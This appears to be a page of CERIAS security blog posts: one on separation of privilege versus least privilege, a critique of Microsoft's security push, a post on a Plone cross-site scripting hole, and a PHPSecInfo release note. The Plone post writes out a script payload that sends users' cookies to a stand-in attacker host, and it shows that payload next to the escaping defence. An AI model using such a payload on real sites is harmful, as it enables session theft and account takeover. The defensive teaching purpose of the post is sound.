The Center for Education and Research in Information Assurance and Security (CERIAS)

CERIAS Blog

Confusion of Separation of Privilege and Least Privilege

Least privilege is the idea of giving a subject or process only the privileges it needs to complete a task.  Compartmentalization is a technique for separating code into parts to which least privilege can be applied, so that if one part is compromised, the attacker does not gain full access.  Why do these get confused all the time with separation of privilege?

Separation of privilege is breaking up a *single* privilege among multiple, independent components or people, so that agreement among several parties, or collusion, is necessary to perform an action (e.g., dual signature checks).  So, if an authentication system has various biometric components, a component that evaluates a token, and another component that evaluates some knowledge or capability, and all have to agree for authentication to occur, then that is separation of privilege.  It is essentially a logical “AND” operation;  in its simplest form, a system would check several conditions before granting approval for an operation.  Bishop uses the example of “su” or “sudo”:  a user (or an attacker who has compromised a process) needs to know the appropriate password, and the user also needs to be in a special group.

A related, but not identical, concept is that of majority voting systems, in which redundant systems have to agree, hopefully outvoting a defective system.  If there were no voting, i.e., if all of the systems always had to agree, it would be separation of privilege.

OpenSSH’s UsePrivilegeSeparation option is *not* an implementation of separation of privilege by that definition;  it simply runs compartmentalized code using least privilege on each compartment.
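To make the “AND” semantics concrete, here is a minimal sketch in PHP; all the check functions and inputs are hypothetical, invented only to illustrate the logic.  Separation of privilege requires every independent component to agree, whereas the related majority-voting scheme tolerates a dissenting component:

  <?php
  // Hypothetical, independent verification components (illustration only).
  function check_biometric(array $req): bool { return $req['fingerprint_ok'] ?? false; }
  function check_token(array $req): bool     { return ($req['token'] ?? '') === 'expected-token'; }
  function check_knowledge(array $req): bool { return ($req['password'] ?? '') === 'expected-password'; }

  // Separation of privilege: a logical AND -- every component must agree.
  function authenticate(array $req): bool {
      foreach (['check_biometric', 'check_token', 'check_knowledge'] as $check) {
          if (!$check($req)) {
              return false; // any single dissenting component denies the action
          }
      }
      return true; // all independent components agreed
  }

  // Contrast: majority voting among redundant components. Related, but not
  // separation of privilege, because unanimity is not required.
  function majority_vote(array $votes): bool {
      return count(array_filter($votes)) * 2 > count($votes);
  }

  var_dump(authenticate([
      'fingerprint_ok' => true,
      'token'          => 'expected-token',
      'password'       => 'expected-password',
  ]));                                          // bool(true): all checks passed
  var_dump(majority_vote([true, true, false])); // bool(true): the defective system is outvoted

In the sudo example, the two conditions ANDed together would be knowledge of the password and membership in the special group.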

What security push?

[tags]Vista, Windows, security, flaws, Microsoft[/tags]

Update: additions added 4/19 and 4/24, at the end.

Back in 2002, Microsoft performed a “security standdown” that Bill Gates publicly stated cost the company over $100 million.  That extreme measure was taken because of the numerous security flaws popping up in Microsoft products, steadily chipping away at MS’s reputation, customer safety, and internal resources.  (I was told by one MS staffer that the response to a major security flaw often cost close to $1 million in staff time, product changes, customer response, and so on.  I don’t know if that is true, but the real figure certainly was, and is, substantial.)

Without a doubt, people inside Microsoft took the issue seriously.  They put all their personnel through a security course, invested heavily in new testing technologies, and even went so far as to convene an advisory board of outside experts (the TCAAB)—including some who have not always been favorably disposed towards MS security efforts.  Security of the Microsoft code base suddenly became a Very Big Deal.

Fast forward 5 years: When Vista was released a few months ago, we saw lots of announcements that it was the most secure version of Windows ever, but that claim was not otherwise qualified; a cynic might comment that such an achievement would not be difficult.  The user population has become habituated to the monthly release of security patches for existing products, with the occasional emergency patch.  Bundling all the patches together undoubtedly helps reduce the overhead in producing them, but it also serves to obscure how many different flaws are contained inside each patch set.  The number of flaws may not really have decreased all that much from years past.

Meanwhile, reports from inside MS indicate that there was no comprehensive testing of personnel to see how the security training worked and no follow-on training.  The code base for new products has continued to grow, thus opening new possibilities for flaws and misconfiguration.  The academic advisory board may still exist, but I can’t find a recent mention of it on the Microsoft web pages, and some of the people I know who were on it (myself included) were dismissed over a year ago.  The external research program at MSR that connected with academic institutions doing information security research seems to have largely evaporated—the WWW page for the effort lists John Spencer as contact, and he retired from Microsoft last year.  The upcoming Microsoft Research Faculty Summit has 9 research tracks, and none of them are in security.

Microsoft seems to project the attitude that they have solved the security problem.

If that’s so, why are we still seeing significant security flaws appear, not only in their old software but also in new software written under the new, extra-special security regime, such as Vista and Longhorn?  The ANI flaw and the recent DNS flaw are glaring examples of major problems that shouldn’t have been in the current code: the ANI flaw is very similar to a years-old flaw that was already known inside Microsoft, and the DNS flaw is yet another buffer overflow!  There are even reports that there may be dozens (or hundreds) of patches awaiting distribution for Vista.

Undoubtedly, the $100 million spent back in 2002 was worth something: the code quality has definitely improved.  There is greater awareness inside Microsoft of security and privacy issues.  I also know for a fact that there are a lot of bright, talented, and very motivated people inside Microsoft who care about these issues.  But questions remain: did Microsoft get its money’s worth?  Did it invest wisely, and if so, why are we still seeing so many (and so many silly) security flaws?  Why does it seem that security is no longer a priority?  What does that portend for Vista, Longhorn, and Office 2007?  (And if you read the “standdown” article, one wonders also about Mr. Nash’s posterior. grin )

I have great respect for many of the things Microsoft has done, and admiration for many of the people who work there.  I simply wish they had some upper management who would realize that security (and privacy) are ongoing process needs, not one-time problems to overcome with a “campaign.”

What do you think?

[posted with ecto]

Update 4/19: The TCAAB apparently does still exist, but with a greater focus on privacy issues than on security.  I do not know who the current members might be.

Update 4/24: I have heard informally from someone inside Microsoft in response to this post.  He pointed out several issues that I think are valid and deserve airing here:

  1. Security training of personnel is ongoing.  It is still unclear to me whether they are employing good educational methods, including follow-up testing, to optimize their instruction.
  2. The TCAAB does indeed continue (and was meeting when I made the original post!).  It has undergone some changes since it was announced, but is largely the same as when it was formed.  What its members are doing, and what effect they are having (if any), is unclear.
  3. Microsoft’s patch process is much smoother now, and bundled patches are easier to apply than lots of individual ones.  (However, there are still a lot of patches for things that shouldn’t be in the code.)
  4. The loss of outreach to academia by MSR does not imply that they aren’t still doing research on security issues.

Many of my questions remain unanswered, including the one about Mr. Nash’s condition….

Do Open Source Devs Get Web App Security?  Does Anybody?

Note: I’ve updated this article after getting some feedback from Alexander Limi.

A colleague of mine who is dealing with Plone, a CMS built atop Zope, pointed me to a rather disturbing document in the Plone Documentation system, one that I feel is indicative of a much larger problem in the web app dev community.

The document describes a hole (subsequently patched) in Plone that allowed users to upload arbitrary JavaScript.  Apparently no input or output filtering was being done.  Anyone familiar with XSS attacks can see the potential for stealing cookie data, but the article seems to imply this is simply a spam issue:

Clean up link spam

Is this a security hole?
No. This is somebody logging in to your site (if you allow them to create their own users) and adding content that can redirect people to a different web site. Your server, site and content security is not compromised in any way. It’s just a slightly more sophisticated version of comment spam. If you open up your site to untrusted users, there will always be a certain risk that people add content that is not approved. It’s annoying, but it’s not a security hole.

Well, yes, actually, it is a security hole.  If one can place JavaScript on your site that redirects the user to another page, one can certainly place JavaScript on your site that grabs a user’s cookie data and sends it to another site.  Whether or not the attacker gets something useful from the data varies from app to app, of course.

What’s worrisome is that one of Plone’s founders (the byline on this document is Alexander Limi, whose user page describes him as “one of Plone’s original founders”) didn’t seem to think this is a security issue.  After getting feedback from Alexander Limi, it is clear that he does understand the user-level security implications of the vulnerability, but was trying to make the distinction that there was no security risk to the Plone site itself.  Still, the language of the document is (unintentionally) misleading, and it is very reminiscent of the kinds of misunderstandings and excuses I see all the time in open-source web app development.
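To see why, consider this sketch; the attacker.example URL, the payloads, and the render_user_content() helper are all hypothetical, but the escaping call is the standard PHP countermeasure.  The same unfiltered injection point that enables “link spam” also enables cookie theft, and escaping user-supplied content on output neutralizes both:

  <?php
  // The "link spam" payload the Plone document worries about...
  $spam = '<script>window.location = "http://attacker.example/";</script>';

  // ...and the cookie-theft payload the same hole permits, which is
  // unambiguously a security issue for the site's users:
  $theft = '<script>new Image().src = "http://attacker.example/c?d="
      + encodeURIComponent(document.cookie);</script>';

  // Standard defense: escape user-supplied content on output so the
  // browser renders it as inert text instead of executing it.
  function render_user_content(string $raw): string {
      return htmlspecialchars($raw, ENT_QUOTES, 'UTF-8');
  }

  echo render_user_content($spam);
  echo render_user_content($theft);
  // Both print as &lt;script&gt;... -- harmless markup, not running code.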

The point here is (believe it or not) not to pick on Plone.  This is a problem prevalent in most open source development (and in closed source dev, from my experience).  People who simply shouldn’t be doing coding are doing the coding—and the implementation and maintenance.

Let’s be blunt: A web developer is not qualified to do the job if he or she does not have a good understanding of web application security concepts and techniques.  Leaders of development teams must stop allowing developers who are weak on security techniques to contribute to their products, and managers need to stop hiring candidates who do not demonstrate a solid secure programming background.  If they continue to do so, they demonstrate a lack of concern for the safety of their customers.

Educational initiatives must be stepped up to address this, both at the traditional academic level and in continuing education/training programs.  Students in web development curricula at the undergraduate level need to be taught the importance of security and effective secure programming techniques.  Developers in the workforce today need access to materials and programs that will do the same.  And the managerial level needs to be brought up to speed on what to look for in the developers they hire, so that under-qualified and unqualified developers are no longer the norm on most web dev teams.

 

PHPSecInfo v0.2 now available

[Screenshot: PHPSecInfo v0.2 output]

The newest version of PHPSecInfo, version 0.2, is now available.  Here are the major changes:

  • Added “more info” links to the output; these lead to pages on the phpsec.org site giving more details on each test and what to do if you have a problem
  • Modified the CSS to improve readability and avoid a license issue with PHP (the old CSS was derived from the output of phpinfo())
  • New test: PhpSecInfo_Test_Session_Save_Path
  • Added display of “current” and “recommended” settings in test result output
  • Various minor changes and bug fixes; see the CHANGELOG for details
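If you want to try it, usage is a one-liner.  The include path and the phpsecinfo() convenience function below are as I understand the 0.2 distribution to ship them; check the bundled README if your layout differs:

  <?php
  // Render the PHPSecInfo report from a page on the server under test.
  // NOTE: restrict access to this page -- the report reveals configuration
  // details that would be useful to an attacker.
  require_once 'PhpSecInfo/PhpSecInfo.php';
  phpsecinfo(); // runs the environment tests and prints the HTML results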

Download now

Join the mailing list

 

What’s New at CERIAS

I haven’t posted an update lately of new content on our site, so here’s a bit of a make-up post:

CERIAS Reports & Papers

CERIAS Hotlist

CERIAS News

CERIAS Security Seminar Podcast